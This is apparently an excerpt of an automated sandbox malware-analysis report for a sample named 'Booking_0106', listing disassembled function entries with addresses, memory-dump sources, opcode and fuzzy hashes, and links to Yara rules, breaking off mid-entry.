Function 059FEBB8 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 059FEC57

Memory Dump Source

Source File: 00000000.00000002.1732067452.00000000059F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59f0000_Booking_0106.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 724e2c1b97d104bde17d7e76b3d42efd6bf4ae726cb331ccf68875227e364fb2
Instruction ID: 08b3cc6ccf647cee65a0968fb2972dd6b2d24e772ca746a705391b79a24b8b85
Opcode Fuzzy Hash: 724e2c1b97d104bde17d7e76b3d42efd6bf4ae726cb331ccf68875227e364fb2
Instruction Fuzzy Hash: 283198B4D002589FCF10CFA9D984ADEFBB5BB49310F24942AE815B7210D735A945CF98

Function 01432039 Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

\s^q, xrefs: 0143209F

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: \s^q
API String ID: 0-4111632511
Opcode ID: 33bd968d4ff4dc7ed0575eae5507d7567fbdc6b66406cca944309646b4196919
Instruction ID: 38c8618bbd777cd46eeca0f6d08f3dd4bda9091d3b2cb9b460130b33fef64cdc
Opcode Fuzzy Hash: 33bd968d4ff4dc7ed0575eae5507d7567fbdc6b66406cca944309646b4196919
Instruction Fuzzy Hash: 09216A717505218FC7A5DB78D804D6AB7F6EFCC66030185AAE60ACB372DA61DC46CB80

Function 059E46E0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

p<^q, xrefs: 059E471A

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: 427096a4c76f03c9e3ade66166a65c6d1726ee548f964947fa773b9dcbd16b18
Instruction ID: d8c662067ea0eb06146b2e2faa969a11cb4ebb9311ebe6c4ec86d02d524151a6
Opcode Fuzzy Hash: 427096a4c76f03c9e3ade66166a65c6d1726ee548f964947fa773b9dcbd16b18
Instruction Fuzzy Hash: F2212C753041549FCF16CF2AC844EAA7BEABF8A210B094095FC59CB361DB36DC51DBA0

Function 059E46CF Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

p<^q, xrefs: 059E471A

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: p<^q
API String ID: 0-1680888324
Opcode ID: c3be0b4f11bdffcbcec3e6124109baf4a9cf515e775729b77647dcd860c1f2ef
Instruction ID: aa6a673abe5a4c171a9cb4a87b9eaf09a185d90a275ab89cee2e002f50075157
Opcode Fuzzy Hash: c3be0b4f11bdffcbcec3e6124109baf4a9cf515e775729b77647dcd860c1f2ef
Instruction Fuzzy Hash: 5F216D753041549FCF16CF29C884EAA7BEAFF8A201F0940A5F84ACB360DA32DC51CB60

Function 059E1A20 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

,bq, xrefs: 059E1A93

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 1360cb2aefc9833269e717008c6574d742ac1edbc025ebd008ad5b4a477d9de0
Instruction ID: 13515cb1c6d54843119c5bb9bd043ac1760802645c3243ff0995ef38ba84cab9
Opcode Fuzzy Hash: 1360cb2aefc9833269e717008c6574d742ac1edbc025ebd008ad5b4a477d9de0
Instruction Fuzzy Hash: 28115E35B00106CFCB05DFA9C994A6EBBB6EF89311F258165E906DB3A5DB30DC41CB91

Function 01430B30 Relevance: 1.3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

Strings

8bq, xrefs: 01430B5B

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: f9262bb6da299cd37a0327a00259c9967041d751569cc8a5897b936884788484
Instruction ID: 14ce904a5a4eb321db09a8b686f4de3111ca501b2476d04183bed1cc9010db11
Opcode Fuzzy Hash: f9262bb6da299cd37a0327a00259c9967041d751569cc8a5897b936884788484
Instruction Fuzzy Hash: 9AF0CD302002049FC341EF68E418EAE3BE7BFC9204B40406AE10ACB366CA319C45CB51

Function 0595112B Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

s, xrefs: 05950224

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: s
API String ID: 0-453955339
Opcode ID: 03469fb9e85b7747b5133077f5690d4b65e241818ac0e270fed211b7c4f8e7c9
Instruction ID: 8cf94a41961df49b3260ecff72a44b18694fb8c676ed70b4dda9cb9c2cd4588c
Opcode Fuzzy Hash: 03469fb9e85b7747b5133077f5690d4b65e241818ac0e270fed211b7c4f8e7c9
Instruction Fuzzy Hash: 2801EF7099522A8FCB64CF28CA8DBEDBBB6AB08354F1005E9C819A3250DB305E80CF45

Function 01430B40 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

8bq, xrefs: 01430B5B

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 13afa550eeaf190315cff4b63a3b0942dbaceb9a7abf3a7538aef79e05e87375
Instruction ID: 86d85546ca0e036368d5747d24c6c3f2060887c63222233445f874b325cfedee
Opcode Fuzzy Hash: 13afa550eeaf190315cff4b63a3b0942dbaceb9a7abf3a7538aef79e05e87375
Instruction Fuzzy Hash: 89F030353011089FC245EB6DE418E5A77DBFBC9215B804169E209C7365DE719C468B91

Function 05B202BF Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

!, xrefs: 05B20327

Memory Dump Source

Source File: 00000000.00000002.1732636387.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b20000_Booking_0106.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 67ed5a4e07c3d3594558bc70106a4bfc8f70e271659b22f5b2509206ffd28ad1
Instruction ID: a2a386f22cfcad74cf9caf7955230a95ea5eb62b38f0fa0f0596d340fe847191
Opcode Fuzzy Hash: 67ed5a4e07c3d3594558bc70106a4bfc8f70e271659b22f5b2509206ffd28ad1
Instruction Fuzzy Hash: B801F67490122DDFEB20DF14C898FEAB7B6FB08300F0081E6E518A7280E7749E848F61

Function 0595C385 Relevance: 1.3, Strings: 1, Instructions: 14COMMON

Download Yara Rule

Strings

w, xrefs: 0595C390

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 266013011f9c382b06f799fe550ef273ac924f1ada9b5e9213b640f2654d3bb1
Instruction ID: 3a49ba45fc8eb26f7a9c6316d16f414e063057ca49c99427ff8ddd4f15a80949
Opcode Fuzzy Hash: 266013011f9c382b06f799fe550ef273ac924f1ada9b5e9213b640f2654d3bb1
Instruction Fuzzy Hash: FFE0EC3094561ACFCB61DF24EC98B99B7B1FB01319F1556A5C80963194DF741AD8CF05

Function 059EDE48 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d22408e3bd5bf07c4d0dba116e9e3b3fd82466b3048d2916248d1106b5cd48a
Instruction ID: 354e4cd07b77bdb54737f3971761f801417e5538f1e278fceb2cfc9f86c4d2d4
Opcode Fuzzy Hash: 9d22408e3bd5bf07c4d0dba116e9e3b3fd82466b3048d2916248d1106b5cd48a
Instruction Fuzzy Hash: 7512EA34B102198FCB15EF64C994A9DB7B6BF89300F5185A8E44AAB365DF30ED85CF50

Function 059EDE38 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb45131c686db21d058cb05de45d503e0cb7fcc135783357a03c1863ede8b640
Instruction ID: 78f3ac6ce451b28ab27f81b4392b1245addbf67b9e8d95a487bbe4fa8da653df
Opcode Fuzzy Hash: eb45131c686db21d058cb05de45d503e0cb7fcc135783357a03c1863ede8b640
Instruction Fuzzy Hash: 96A1D834B102198FCB15DF64C898B9DBBB6BF89300F5485A8E44AAB365DB30ED85CF50

Function 059EEDF0 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa992e7ed41f9bdaeeb0779d01dfc7d130271527b4bdb30cc419db887387123
Instruction ID: 8d79f4391cfa6cdd99f9daaf4a42b26ec38db4b64750738f9a216efde781814f
Opcode Fuzzy Hash: eaa992e7ed41f9bdaeeb0779d01dfc7d130271527b4bdb30cc419db887387123
Instruction Fuzzy Hash: 0E812934710614DFCB15DF68D898A6EBBF6BF89710F1485A9E4069B3A1CB34EC42CB90

Function 059E0EC8 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83baeb09bf19aca470f059c6adc50253de05a6cc6b1ba3029b503cb9623a8650
Instruction ID: 3577b6822c9dc86b9d9794363eab03f3958dc6930407a14b920cb62efd69b549
Opcode Fuzzy Hash: 83baeb09bf19aca470f059c6adc50253de05a6cc6b1ba3029b503cb9623a8650
Instruction Fuzzy Hash: 31816935B152089FCB06CFA5D959AADBBF6FF88211F208469E406AB390CB75DE41CF50

Function 059E6868 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e2a192a64124482299446daf09edfb10fb09be296bb9da918d1c8745b438d68
Instruction ID: 701c30a1c0311196535728c690d9fa788659025cb1e43d20598e0fec7d10877b
Opcode Fuzzy Hash: 0e2a192a64124482299446daf09edfb10fb09be296bb9da918d1c8745b438d68
Instruction Fuzzy Hash: E1811875A00218CFCB15DF68D58499EBBFAFF58310B2585A9E816DB361DB30ED41CB90

Function 05C7AD18 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfc65fee819ac0046ff66a8d4dd1d348793b745d2b38774129672efdcb76a8c3
Instruction ID: 7c9b89e67797c937229f9e831168e1c84ce26c0b7a97a35dd7e82c5c94f8affa
Opcode Fuzzy Hash: bfc65fee819ac0046ff66a8d4dd1d348793b745d2b38774129672efdcb76a8c3
Instruction Fuzzy Hash: 18710474E0121DCFCB04DFA9D888AAEBBB2FB59301F108429D41AA7794DB345E45CF50

Function 059EEDE0 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4deea4340599e51310f61304fd3c232ee4de37545ce9d891cfe771044dd80d
Instruction ID: 61418732945d487151ecb9bb8b7196b267aaef43bc08315a873bc9b1bb891f1a
Opcode Fuzzy Hash: 4a4deea4340599e51310f61304fd3c232ee4de37545ce9d891cfe771044dd80d
Instruction Fuzzy Hash: 8C61FA34B10614DFCB15DF68D898AADB7BABF89710F1485A9E5069B365CB30EC41CB90

Function 059EE12B Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ac31517ecd25f5f6cad86fce0c678056871eaa11d236eb86e313b5190893183
Instruction ID: 6413ff2507fc61ad578d63409529924ea655a15bee2fa19e7aa4f0224f7a43c9
Opcode Fuzzy Hash: 2ac31517ecd25f5f6cad86fce0c678056871eaa11d236eb86e313b5190893183
Instruction Fuzzy Hash: 4851F834B002158FDB15DF64C898BADBBB6BF89300F5095A8E50AAB265DF30ED85CF40

Function 059E9B38 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a39a4f8bc8fb36fc8424743ca0c07bda81025dd7cb063b1781a9e8aa0bb3946
Instruction ID: b302d65aa6a8f3272272fc71458c68af39618ea9573c8f4e5546a575e88163a7
Opcode Fuzzy Hash: 4a39a4f8bc8fb36fc8424743ca0c07bda81025dd7cb063b1781a9e8aa0bb3946
Instruction Fuzzy Hash: 1D514C38B106099FCB14EF64E499AAEBBB6FF88715F008119F5069B364DF349906CF91

Function 05C78DE0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732699313.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c60000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 451f319cc73a24cacd53bb38012d83329f27f1230a7ed53ed965a670318f65a7
Instruction ID: 47a44e6d4aaffd10f55f8537c6fb778fa7ea5aa889b0056bd00e0153525dc75d
Opcode Fuzzy Hash: 451f319cc73a24cacd53bb38012d83329f27f1230a7ed53ed965a670318f65a7
Instruction Fuzzy Hash: C351CE78E0121DCFCB04DFAAD848AEDBBB2BB89310F10992AD615A7750DB745A45CF90

Function 05956DDA Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 089e0c625de8a5607c7c41ed1e42876d8f83f5fefac14a26f91c4d6be9d75e8d
Instruction ID: 9c845049ad2025fd13d1390239859fdfc70bf2beb5af0943a55808aad54c6a55
Opcode Fuzzy Hash: 089e0c625de8a5607c7c41ed1e42876d8f83f5fefac14a26f91c4d6be9d75e8d
Instruction Fuzzy Hash: 6A510474E01208DFDB28CFB9D484A9DBBB2FF89314F60816AE805AB350DB319946CF40

Function 059E15E8 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 894878038337ec8d7549b108ebede20a7e8774ad8def2a5480d4493abd3fb237
Instruction ID: 961fd975ce76449d64d9ea8e490739f7a640c188d128df9c7b8e44633ec428cf
Opcode Fuzzy Hash: 894878038337ec8d7549b108ebede20a7e8774ad8def2a5480d4493abd3fb237
Instruction Fuzzy Hash: BC414834B04209DFCB15DB68D894F6ABBF6FB89704F188469E80A9B394DB71E841DF50

Function 059EC710 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ca8675c0b301873e5e0270ff32f30091407bfa7aa803c8dd3e02dbc818505f0
Instruction ID: 7526b4f94b9ca4c58c466acb598ccf9b55f9dc938a74eaf036ebfedc1f9eef4a
Opcode Fuzzy Hash: 8ca8675c0b301873e5e0270ff32f30091407bfa7aa803c8dd3e02dbc818505f0
Instruction Fuzzy Hash: BF31E536610108DFCB05DF68D998EA9BBB6FF49320F0640A8E9099B372C732EC55DB40

Function 059E1778 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba706f73bc70ad4b8bc2dc0b8ce71187020b98d26831c2ff62e548a22a5342b2
Instruction ID: 2ca5845ffbf496827165cdd8438927f5b75af8403a9969944da2f7f806440296
Opcode Fuzzy Hash: ba706f73bc70ad4b8bc2dc0b8ce71187020b98d26831c2ff62e548a22a5342b2
Instruction Fuzzy Hash: 11419A71A002198FDB15CFA5C854ABEBBB6FF88740F00843AD916E72A0D739D945CB91

Function 05957028 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcaaccf67d8a086ebb8b69ced81ba017b2f21f879c9b2988650a7c046fc09779
Instruction ID: 79f5cc696b74ca54e51cae03b5fe4606df051963c9b9d9c3df51d80ca7075913
Opcode Fuzzy Hash: fcaaccf67d8a086ebb8b69ced81ba017b2f21f879c9b2988650a7c046fc09779
Instruction Fuzzy Hash: EA319CB1C0420DEFDB14CFE4E8847AEBFB5FB08354F6055AAE819A7250DB305A5ACB51

Function 059EF0F7 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23c5d60d172e454cfe9d0065126437c10b10501b8392ace0be513bda417bdd1c
Instruction ID: f472957d15566cb2ecc427514f4efc703c2a40126494d5cc15ec6a9ca9190cfc
Opcode Fuzzy Hash: 23c5d60d172e454cfe9d0065126437c10b10501b8392ace0be513bda417bdd1c
Instruction Fuzzy Hash: A9310135A001199FDF15DF64D959AEEB7B6FF88310F148126E802B7394DB31AD05CBA4

Function 059E7D60 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e930af603bd40b1f6c0b271fef9b6862fda78470e057ff638b7bff71209a48
Instruction ID: 7f8debbba24e5e856344b1eb67a0b657d326f93c2827c67e6b75452c414b5a2a
Opcode Fuzzy Hash: e9e930af603bd40b1f6c0b271fef9b6862fda78470e057ff638b7bff71209a48
Instruction Fuzzy Hash: 5B319E31A00248CFDB1ADFA4C594AADB7F2FF88301F1044A9E406AB3A5DB359D45CBA1

Function 0595DDA0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a758b0b857087a6e20f120d1aece74c67a5cc9f674da44e7c14c4b1e904783
Instruction ID: a12fbe9a24b0bcb77522b29154a751aa5783b4db99df3076c330ce4f8d91de0f
Opcode Fuzzy Hash: b6a758b0b857087a6e20f120d1aece74c67a5cc9f674da44e7c14c4b1e904783
Instruction Fuzzy Hash: 9D31F2B0E05219CBDB04CFA9D844BEEBBF6BB88310F10842AE815B3250D7745A54CFA1

Function 0595DFB0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731779788.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5950000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db1af2b8a2127a243889d991e1d74988ead71768243490bf65509d4d81c01244
Instruction ID: e33111682765357f29ea01d106b8cbf315e272a89dac33bb4a45bebbe4aca50a
Opcode Fuzzy Hash: db1af2b8a2127a243889d991e1d74988ead71768243490bf65509d4d81c01244
Instruction Fuzzy Hash: EB311870E1420ACFCB04CFA9D448BEEBBF6BB48320F04956AE815B7290DB755A54CF50

Function 059E3DC8 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13bd8f13df7064c373f78ffc2dfc9dab62f456780638b16beb721faea448a386
Instruction ID: fc8151e8e52256fabb2cbb10b3916577aa50aeba779606e14d06c55c707adf48
Opcode Fuzzy Hash: 13bd8f13df7064c373f78ffc2dfc9dab62f456780638b16beb721faea448a386
Instruction Fuzzy Hash: B5316A347112059FC726AF74D844A6ABBB6FF85305B10886DE8468B3A1DF31EC4ACB80

Function 059EFEC0 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee67af965d48ad4743d4bd69630699dff7e35e85643df5e2323032edb674a69
Instruction ID: 19e9b0ff50b372aeedae8fceebba6da54baaa456ac01b9756ee0b19453cffdb4
Opcode Fuzzy Hash: fee67af965d48ad4743d4bd69630699dff7e35e85643df5e2323032edb674a69
Instruction Fuzzy Hash: 15216274B10A198FCB01EF68D5448AEB7F6EFC9700B10452AE50697364EF70AE46CBD1

Function 01437A51 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 272dced911b695777f1588b7cb2d5135280d4e3bda3b82a8b15017d59a1c7959
Instruction ID: a9562adc275d508b2c92126c22859b0e65c0a606f50343954e68f610d687c771
Opcode Fuzzy Hash: 272dced911b695777f1588b7cb2d5135280d4e3bda3b82a8b15017d59a1c7959
Instruction Fuzzy Hash: F02125B4D0020D8BDB04EFE9D8483EEBBF1BB98301F10852AD115B3394DB744A428FA1

Function 059E3C00 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2462028c9ce57a9a45bfc0c90c4bc1107f268b06715a062298ded68993b97833
Instruction ID: 2618c9cd239a110e71af8978e7cac69fcc91c1f6691090203033e62a66fbc06f
Opcode Fuzzy Hash: 2462028c9ce57a9a45bfc0c90c4bc1107f268b06715a062298ded68993b97833
Instruction Fuzzy Hash: 80213D71E00219DFDB11DF74C504BAEBBF9AB44344F208866D91AEB290E734EA55CB91

Function 01437A60 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1711144407.0000000001430000.00000040.00000800.00020000.00000000.sdmp, Offset: 01430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1430000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cae2980f1f4a8c006191eab46ddae2c0a3972bcec8a1181456a8ac247975d98
Instruction ID: 139ee7cc82a46d6256477f348ac5ab3747fe8bc624993b8fdf5b55942ef7631e
Opcode Fuzzy Hash: 4cae2980f1f4a8c006191eab46ddae2c0a3972bcec8a1181456a8ac247975d98
Instruction Fuzzy Hash: E921F3B4D0020D8BDB04EFA9D8487EEBBF1BB9D312F10852AD555A3294DB744A468FA1

Function 0121D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710694048.000000000121D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0121D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_121d000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc410ff4028347bdc80fb3eac51017c2902c44264d4f4272f7595d0c6494d482
Instruction ID: 5f15d925e289c008039f003fc42ab77396890aa0782cfdb7091bae9ecece17d2
Opcode Fuzzy Hash: fc410ff4028347bdc80fb3eac51017c2902c44264d4f4272f7595d0c6494d482
Instruction Fuzzy Hash: 1B213471514248DFCB11DF58DAC8B27BFA5FB94354F20C569EA094B24AC33BD44ACBA2

Function 059EC702 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f054ee5d6dc4efe4ec70feab5484ef0e7668117113e460c873b3eadcba9377d6
Instruction ID: 45a4d464d3b50d7f7c0d9a09ea24a4e11078c0f1df2d9f9a51ef8d41b3b172a6
Opcode Fuzzy Hash: f054ee5d6dc4efe4ec70feab5484ef0e7668117113e460c873b3eadcba9377d6
Instruction Fuzzy Hash: 5821E736600104EFCB05CFA9D999E99BBB6FF48310F1640A9F6099B272C732E815DB50

Function 059EFEB0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732028108.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_59e0000_Booking_0106.jbxd

Similarity

API ID:
String ID:
API String ID:
